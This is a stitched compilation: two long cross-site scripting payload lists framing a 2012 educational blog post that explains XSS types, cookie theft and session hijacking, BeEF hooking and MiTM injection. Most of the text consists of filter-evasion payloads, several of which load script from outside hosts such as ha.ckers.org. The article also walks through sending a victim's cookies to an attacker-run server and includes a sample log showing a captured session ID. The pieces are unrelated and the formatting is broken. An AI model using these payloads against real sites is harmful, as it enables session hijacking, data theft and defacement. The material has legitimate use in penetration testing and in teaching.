<SCRIPT SRC=http://ha.ckers.org/xss.js?
<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.j
s\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\
]^`=alert(\"XSS\")>
<SCRIPT/XSS
SRC=\"http://ha.ckers.org/xss.js\"><
/SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\
0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\
0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"javascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3
A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#
x29>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099
&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#00
00108&#0000101&#0000114&#0000116&#0000040&#0000039&#000008
8&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=javascript:alert('XSS')>
<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83
))>
<IMG
\"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"&gt
;
<IMG SRC=`javascript:alert(\"RSnake says,
'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT
SRC=http://ha.ckers.org/xss.js></SCR
IPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(Strin
g.fromCharCode(88,83,83))//\";alert(String.fromCha
rCode(88,83,83))//\\";alert(String.fromCharCode(88,83,
83))//--></
SCRIPT>\">'><SCRIPT>alert(String.fromCh
arCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fr
omCharCode(88,83,83))//";alert(String.fromCharCode(88,83,8
3))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</
SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
�script�alert(�XSS�)�/script�
<META HTTP-EQUIV="refresh"
CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME
SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image:
url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\
0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<A
STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pr
ession(alert("XSS"))'>
<EMBED SRC="http://ha.ckers.org/xss.swf"
AllowScriptAccess="always"></EMBED>
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\"
)";eval(a+b+c+d+e);
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-
microsoft-com:time"><?import namespace="t"
implementation="#default#time2"><t:set
attributeName="innerHTML" to="XSS<SCRIPT
DEFER>alert("XSS")</SCRIPT>"></BODY></H
TML>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<form id="test" /><button form="test"
formaction="javascript:alert(123)">TESTHTML5FORMACTION
<form><button
formaction="javascript:alert(123)">crosssitespt
<frameset onload=alert(123)>
<img src=x onerror=alert(123)//">
<style><img src="</style><img src=x onerror=alert(123)//">
<object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaX
B0Pg==">
<embed
src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB
0Pg==">
<embed src="javascript:alert(1)">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<script>({0:#0=alert/#0#/#0#(123)})</script>
<script>ReferenceError.prototype.__defineGetter__('name',
function(){alert(123)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}]
[0].constructor._('alert(1)')()</script>
<script src="#">{alert(1)}</script>;1
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(
1)',384,null,'rsa-dual-use')</script>
<svg xmlns="#"><script>alert(1)</script></svg>
<svg onload="javascript:alert(123)" xmlns="#"></svg>
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script
%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+
AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location
%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
'><s'%2b'cript>alert(document.cookie)</script>
'><ScRiPt>alert(document.cookie)</script>
'><<script>alert(document.cookie);//<</script>
foo<script>alert(document.cookie)</script>
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b
%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E
%22)'%3E
'; alert(document.cookie); var foo='
foo\'; alert(document.cookie);//';
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert('XSS')>
<script>alert(1)</script>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75,
73, 99, 101))</script>
<video src=1 onerror=alert(1)>

<audio src=1 onerror=alert(1)> Chris Dale

Twitter – @chrisadale

 Home
 Blog archive
 Tips & Tricks
I'm Chris Dale from Norway, founder and principal consultant at River Security (https://riversecurity.eu/).
Along with my security expertise, I have a background from system development and application management.
Having a vast and broad experience in IT certainly help a great deal when working penetration tests and
incidents.

I am an open, sharing and engaging person to be around, some even think I'm funny. I am usually enthusiastic
and motivating when I work, and usually positive and optimistic about the general problems I encounter. I am
passionate about security, both IT and physical security, which is one of the reasons I do a lot of public
speaking at different events such as classes, conferences and workshops.

Driven by mottos such as "Magic is just science we don't understand yet" and "Think bad, do good", I attack
today's security challenges with eagerness and enthusiasm. I consider myself a pragmatic person, with the
ability to think outside the box, keeping the business in focus.

I also teach for SANS. My primary class I am teaching is Hacking Techniques, Exploits & Incident Handling.
This course prepares you for the GIAC Certification in Incident Handling (GCIH). I find it extremely
motivating and fun to teach others the art of security and hacking, and I often find that my passion and
enthusiasm rubs off on my students.

Blog

Guide To Understanding XSS –

Payloads, Attack Vectors, BeEF
Hooking, MiTM With Shank And
Some History
29/08/2012Tagged BeEF, cookies, Cross site scripting, MiTM, session hijack, xss

Cross site scripting is vulnerabilities in web applications that involves injecting valid

HTML or scripts in some form or way.

XSS is a very widespread vulnerability (see OWASP TOP 10) on the internet today. It
is both easy to eliminate and easy to detect. It is however usually harder to exploit than

for example SQL Injection. According to OWASP it is also stated to have moderate

impact when exploited, however I find this very debatable. According to Ed

Skoudis this vulnerability can have catastrophic effects!

XSS Payload – Presented in 3

different ways
Non-persistent (often called reflected XSS)
A non-persistent XSS is when you are able to inject code and the server returns it back

to you, unsanitized. Often this can be exploited by distributing an (usually innocent

looking) URL in some form or way for others to click on. It is important to note that

this type of payload is not stored on the system being attacked, e.g. in a database.

This type of a attack can be particular effective when you are dealing with focused

attacks against someone. As long as you can make someone click an URL with the

necessary payload there is a chance you can gain elevated privileges on the system.

Persistent
If you are able to make the end system store your payload (persist) the attacks becomes

much more dangerous very fast. A persistent XSS payload is reflected back to you

from the server (not just by clicking a link), usually because the XSS has been stored in

a database field or similar. The user is then presented with an attack served by the

webserver itself thus making it look legal.

Consider the following input is stored to database and then presented back to you on
your profile on the victim site:

This HTML code would give you a input field looking something like this:

If you are able to make the application accept and store unsanitized input, all you have

to do is make other users view your profile (or wherever the XSS is reflected back).

The payload would then be run on the client system in trust that the victim host was

meant to send you the payload.

These kinds of XSS can be not only hard to spot, but very devastating to the victims.

Just take a look at Samy worm which we described earlier on this article.

In the early days of the internet this XSS attack was very frequently

exploited. Regularly you would see this kind of exploit all over guestbooks, forums,

user reviews, chat rooms and so on. The following image describes a usual sight for an

old school internet user:

In order to describe the seriousness of this type of attack consider if such an exploit

was present in eBay’s auction service. Anytime someone visits your auction they
automatically bid on the auction. This type of attack would most likely be trivially easy

to exploit unless proper protection is put in place.

DOM-based
Very similar to non-persistent, but where the javascript payload does not have to be

echoed back from the webserver. This can often be where simply the value from an

URL parameter is echoed back onto the page on the fly when loading using already

resident javascript.

Example:

http://victim/displayHelp.php?title=FAQ#

Of course criminals would modify the URL to make it more innocent looking for the

untrained eye. The same payload as above just encoded differently:

http://victim/displayHelp.php?title=FAQ#<scri

#112t>alert(docum

ent.cookie)</sc

ript>

It is suddenly much harder to tell it apart from non-harmful parameters.

You can even mask it better when sending to email clients that support HTML like this:

http://victim/displayHelp.php?title=FAQ

Two attack vectors

Now that you know the different ways of delivering a XSS payload I’d like to mention
a few XSS attack vectors that can be very dangerous.

XSS defacement
Defacement is not a hard feat to accomplish once a XSS exploit is found. If the XSS is

persistent as well, it can be a hassle for the sysadmins to figure it out. If you include

the this javascript from ha.ckers.org you will produce the following product:

As you can see from the image, this exploit was found on Amazon.com. It is in fact a

quite spectacular exploit because it involved the book XSS Attacks: Cross Site

Scripting Exploits and Defense which was uploaded to Amazon. The book was made

available for preview and thus, because no proper sanitation, the payloads in the book

was executed against anyone looking to buy the book.

Cookie stealing and session hijacking

Ahh.. The classic cookie stealing exploit.

Like in one of the examples above, once you can access users cookies you can also

grab sensitive information. Capturing sessionID’s can lead to session hijacking, which

in turn can lead to elevated privileges on the system.

Consider a site containing a search field that does not have proper input sanitizing. By
crafting a search query with a javascript payload you can gain access to data owned by

any user clicking the link. Such a query may look something like this:

">

Sitting on the other end, at the webserver, you will be receiving visitors revealing the

users cookie from the victim site. The data is sent through the x parameter where after

the double space is the users cookie. Even if the file that is being used is a .GIF file it

may still be a programmable script that stores the values in a database. You might

strike lucky if an administrator clicks the link, allowing you to steal their sessionID ,

hijacking their session and allowing you to become administrator of the victim site.

Using techniques like spam email, message board posts, IM messages, Social

Engineering Toolkits, this vulnerability can be very dangerous.

If the .GIF file does not exist on the server you are controlling it will simply show up as

a 404 file not found, but still revealing the parameter to the file. The attacker can scrape

the server logs or use a custom written script to pick up all the session ID’s and proceed

to hijack them in order to further exploit the target. This is an example of what it could

look like in the server log:

192.168.20.174 - - [20/Aug/2012:09:20:45 +0200] "GET /a.gif?x=security%3Dlow%3B

%20PHPSESSID%3D1sbhurqchkd2hk6m35gjg5oef4 HTTP/1.1" 404 503
"http://192.168.20.136/dvwa/vulnerabilities/xss_s/" "Mozilla/5.0 (X11; Linux i686)
AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1"

The value PHPSESSID is the valuable part in this attack. Using this value as your own

may in most cases allow you to act as that person in the respective web-application.

Simply by editing your own cookies and replacing the PHPSESSID value with the new
value will usually allow you to become someone else.

Exploiting XSS with BeEF

To easy see how XSS can be exploited I recommend trying out BeEF, Browser

Exploitation Framework. Once you unpack and run it on a webserver you can easily try

spawning a simulation of a victim (called a zombie) where you can very easy try out

different XSS payloads. To mention some:

•Steal cookie •Keylogger / event sniffer

•Get page HTML •Find browser details
•Create alert boxes and command dialogs •Deface page
•Ask the user to reauthenticate •Rewrite links
•Redirect user to other pages •Replace videos
•Integrated with Metasploit! •Steal clipboard
•Send java payload •Detect TOR
•Enumerate network •Autorun exploits when connected to BeEF
•Ping sweep network •Metasploit AUTOPWN

Injecting XSS when Man in the

Middle
If you can become Man in the Middle (MITM) on a target you may very well inject

valid HTML code into the packets going through your computer. Although this is a

rather new technique to me it is a very interesting and effective way of exploiting users.

This type of exploiting users via XSS was known to me via a presentation done on

Blackhat by Ryan Linn (web, twitter) and Steve Ocepek (twitter) from Spiderlabs.

Shank is a tool that lets you MiTM and at the same time downgrade any encoding, and

finally inject a javascript payload into the HTML header.

By combining Shank with BeEF you have a very interesting attack vector. This type of

attack will let you more easily persist hooks on victims. Some of the features this
vector allows for can be:

 Poison anyone using HTTP with BeEF hooks

 Persist the hooks when browser changes pages
 Create more subtle and stealthy attacks on the browsers
This combined with the features of BeEF can turn out to be a truly interesting and

dangerous attack.

History on XSS
The Samy worm (js.spacehero)

1 million friend requests (source:http://namb.la/popular/)

Remember MySpace? Yea, me neither.

Basically Samy Kamkar (web, twitter) made a javascript worm which propagated

through an XSS vulnerability in MySpace. The worm quickly spread to anyone

viewing Samy’s profile and from there the worm installed itself in their profile

and continued the spread. The infection rate increased drastically and within 20 hours

the payload had reached over 1 million users (source: http://namb.la/popular/).

Barack Obama’s site redirected to Hilary Clinton

Another similar XSS exploit found on the same site. This exploit proves that

the attacker can harvest cookies from other visitors. Source. xssed.com

An attacker managed to find a XSS vulnerability in barackobama.com. The payload

involved redirecting all visitors to hilaryclinton.com. Even though it is quite harmless

for visitors it coul

d potentially have an impact on Obama’s campaign.

Source: ttp://xssed.com/news/65/Barack_Obamas_official_site_hacked/.

A hacker named Mox confessed in Obama’s community boards that he was the one

who had executed the exploit. He said that the scripts accepting HTML did not sanitize

the characters ” and >, thus he was able to inject javascript into the page. Any

subsequent visitors would then run the payload and be redirected to Hilary Clinton’s

page.
CNN Forecasts false tornado warning in Florida

A couple of years ago there was a link to CNN about a hurricane warning that went

viral in a very short time. The link contained information about an incoming hurricane

that would hit Florida in a matter of time.

This type of XSS is what we call non-persistent XSS and will be explained further

down in the article. The link itself contained the payload in one of the parameters, but

people did not recognize as the site they arrived at was CNN and the story seemed like

just like the rest of the page.

This type of “prank” could cause numerous effects, probably not intentional. To list a

few:

 Hysteria / panic
 Increased sales of emergency ration
 Closed business deals
 Cancellation of travel tickets
 … Do feel free to leave a comment if you can come up with more side effects.
http://security.stackexchange.com/a/1373/294.[/important]

Chris Dale
I'm Chris Dale from Norway, founder and principal consultant at River Security
(https://riversecurity.eu/). Along with my security expertise, I have a background from
system development and application management. Having a vast and broad experience
in IT certainly help a great deal when working penetration tests and incidents.

I am an open, sharing and engaging person to be around, some even think I'm funny. I
am usually enthusiastic and motivating when I work, and usually positive and
optimistic about the general problems I encounter. I am passionate about security, both
IT and physical security, which is one of the reasons I do a lot of public speaking at
different events such as classes, conferences and workshops.

Driven by mottos such as "Magic is just science we don't understand yet" and "Think
bad, do good", I attack today's security challenges with eagerness and enthusiasm. I
consider myself a pragmatic person, with the ability to think outside the box, keeping
the business in focus.

I also teach for SANS. My primary class I am teaching is Hacking Techniques,

Exploits & Incident Handling. This course prepares you for the GIAC Certification in
Incident Handling (GCIH). I find it extremely motivating and fun to teach others the art
of security and hacking, and I often find that my passion and enthusiasm rubs off on
my students.

http://www.securesolutions.no

Post navigation
Ways to retrieve a missing persons account passwords

Distribuert tjenestenekt: «Fordi vi kan» (Norwegian)

One thought on “Guide to understanding XSS –

Payloads, attack vectors, BeEF hooking, MiTM with
Shank and some history”
1. Pingback: Autortrapprove List

Leave a Reply
Your email address will not be published. Required fields are marked *
Comment

Name *
Email *
Website

Post Comme nt

Related Posts

I’ve established a new company!

13/06/2020
Docker for Information Security Professionals
28/05/2020
YouTube video release – Fuzzing for vulnerabilities
20/05/2020

yaatra | Theme: yaatra by CodeVibrant.

XSS Payload List :

<!-- Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload

List -->

<script\x20type="text/javascript">javascript:alert(1);</script>

<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>

<script\x09type="text/javascript">javascript:alert(1);</script>

<script\x0Ctype="text/javascript">javascript:alert(1);</script>

<script\x2Ftype="text/javascript">javascript:alert(1);</script>

<script\x0Atype="text/javascript">javascript:alert(1);</script>

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

<img src=1 href=1 onerror="javascript:alert(1)"></img>

<audio src=1 href=1 onerror="javascript:alert(1)"></audio>

<video src=1 href=1 onerror="javascript:alert(1)"></video>

<body src=1 href=1 onerror="javascript:alert(1)"></body>

<image src=1 href=1 onerror="javascript:alert(1)"></image>

<object src=1 href=1 onerror="javascript:alert(1)"></object>

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<svg onResize svg onResize="javascript:javascript:alert(1)"></svg

onResize>

<title onPropertyChange title

onPropertyChange="javascript:javascript:alert(1)"></title

onPropertyChange>

<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe

onLoad>

<body onMouseEnter body

onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>

<body onFocus body onFocus="javascript:javascript:alert(1)"></body

onFocus>

<frameset onScroll frameset

onScroll="javascript:javascript:alert(1)"></frameset onScroll>

<script onReadyStateChange script

onReadyStateChange="javascript:javascript:alert(1)"></script

onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html

onMouseUp>

<body onPropertyChange body

onPropertyChange="javascript:javascript:alert(1)"></body

onPropertyChange>

<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>

<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body

onPageHide>

<body onMouseOver body

onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>

<body onUnload body onUnload="javascript:javascript:alert(1)"></body

onUnload>

<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>

<bgsound onPropertyChange bgsound

onPropertyChange="javascript:javascript:alert(1)"></bgsound

onPropertyChange>

<html onMouseLeave html

onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>

<html onMouseWheel html

onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>

<style onLoad style onLoad="javascript:javascript:alert(1)"></style

onLoad>

<iframe onReadyStateChange iframe

onReadyStateChange="javascript:javascript:alert(1)"></iframe

onReadyStateChange>

<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body

onPageShow>

<style onReadyStateChange style

onReadyStateChange="javascript:javascript:alert(1)"></style

onReadyStateChange>
<frameset onFocus frameset

onFocus="javascript:javascript:alert(1)"></frameset onFocus>

<applet onError applet onError="javascript:javascript:alert(1)"></applet

onError>

<marquee onStart marquee

onStart="javascript:javascript:alert(1)"></marquee onStart>

<script onLoad script onLoad="javascript:javascript:alert(1)"></script

onLoad>

<html onMouseOver html

onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>

<html onMouseEnter html

onMouseEnter="javascript:parent.javascript:alert(1)"></html

onMouseEnter>

<body onBeforeUnload body

onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>

<html onMouseDown html

onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>

<marquee onScroll marquee

onScroll="javascript:javascript:alert(1)"></marquee onScroll>

<xml onPropertyChange xml

onPropertyChange="javascript:javascript:alert(1)"></xml

onPropertyChange>

<frameset onBlur frameset

onBlur="javascript:javascript:alert(1)"></frameset onBlur>

<applet onReadyStateChange applet

onReadyStateChange="javascript:javascript:alert(1)"></applet

onReadyStateChange>

<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg

onUnload>

<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html

onMouseOut>

<body onMouseMove body

onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>

<body onResize body onResize="javascript:javascript:alert(1)"></body

onResize>

<object onError object onError="javascript:javascript:alert(1)"></object

onError>

<body onPopState body onPopState="javascript:javascript:alert(1)"></body

onPopState>

<html onMouseMove html

onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>

<applet onreadystatechange applet

onreadystatechange="javascript:javascript:alert(1)"></applet

onreadystatechange>

<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body

onpagehide>

<svg onunload svg onunload="javascript:javascript:alert(1)"></svg

onunload>

<applet onerror applet onerror="javascript:javascript:alert(1)"></applet

onerror>

<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body

onkeyup>

<body onunload body onunload="javascript:javascript:alert(1)"></body

onunload>

<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe

onload>

<body onload body onload="javascript:javascript:alert(1)"></body onload>

<html onmouseover html

onmouseover="javascript:javascript:alert(1)"></html onmouseover>

<object onbeforeload object

onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>

<body onbeforeunload body

onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>

<body onfocus body onfocus="javascript:javascript:alert(1)"></body

onfocus>

<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body

onkeydown>

<iframe onbeforeload iframe

onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>

<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>

<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>

<html onmousemove html

onmousemove="javascript:javascript:alert(1)"></html onmousemove>

<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>

\x3Cscript>javascript:alert(1)</script>

'"`><script>/* \x2Fjavascript:alert(1)// /</script>

<script>javascript:alert(1)</script\x0D

<script>javascript:alert(1)</script\x0A

<script>javascript:alert(1)</script\x0B

<script charset="\x22>javascript:alert(1)</script>

--> <img src=xxx:x onerror=javascript:alert(1)> -->

-->

-->

-->

`"'><img src='#\x27 onerror=javascript:alert(1)>

<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>

"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>

<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>

<script>/* \x2A/javascript:alert(1)// /</script>

<script>/* \x00/javascript:alert(1)// /</script>

<style></style\x3E<img src="about:blank"

onerror=javascript:alert(1)//></style>

<style></style\x0D<img src="about:blank"

onerror=javascript:alert(1)//></style>

<style></style\x09<img src="about:blank"

onerror=javascript:alert(1)//></style>

<style></style\x20<img src="about:blank"

onerror=javascript:alert(1)//></style>

<style></style\x0A<img src="about:blank"

onerror=javascript:alert(1)//></style>

"'`>ABC<div style="font-family:'foo'\

x7Dx:expression(javascript:alert(1);/*';">DEF

"'`>ABC<div style="font-family:'foo'\

x3Bx:expression(javascript:alert(1);/*';">DEF

<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>

<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>

'`"><\x3Cscript>javascript:alert(1)</script>

'`"><\x00script>javascript:alert(1)</script>

"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>

"'`><\x00img src=xxx:x onerror=javascript:alert(1)>

<script src="data:text/plain\x2Cjavascript:alert(1)"></script>

<script src="data:\xD4\x8F,javascript:alert(1)"></script>

<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>

<script src="data:\xCB\x8F,javascript:alert(1)"></script>

<script\x20type="text/javascript">javascript:alert(1);</script>

<script\x3Etype="text/javascript">javascript:alert(1);</script>

<script\x0Dtype="text/javascript">javascript:alert(1);</script>

<script\x09type="text/javascript">javascript:alert(1);</script>

<script\x0Ctype="text/javascript">javascript:alert(1);</script>

<script\x2Ftype="text/javascript">javascript:alert(1);</script>

<script\x0Atype="text/javascript">javascript:alert(1);</script>

ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF

ABC<div style="x:expression\x5C(javascript:alert(1)">DEF

ABC<div style="x:expression\x00(javascript:alert(1)">DEF

ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF

ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF

ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF

ABC<div style="x:\x09expression(javascript:alert(1)">DEF

ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF

ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF

ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF

ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF

ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF

ABC<div style="x:\x20expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF

ABC<div style="x:\x00expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF

ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF

ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF

<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xC2\xA0javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x80\x88javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\xE2\x80\x89javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\xE2\x80\x80javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x80\x82javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x80\xAFjavascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x80\x81javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE2\x80\x87javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>

<a href="\xE1\x9A\x80javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

<a href="\xE2\x80\x83javascript:javascript:alert(1)"

id="fuzzelement1">test</a>

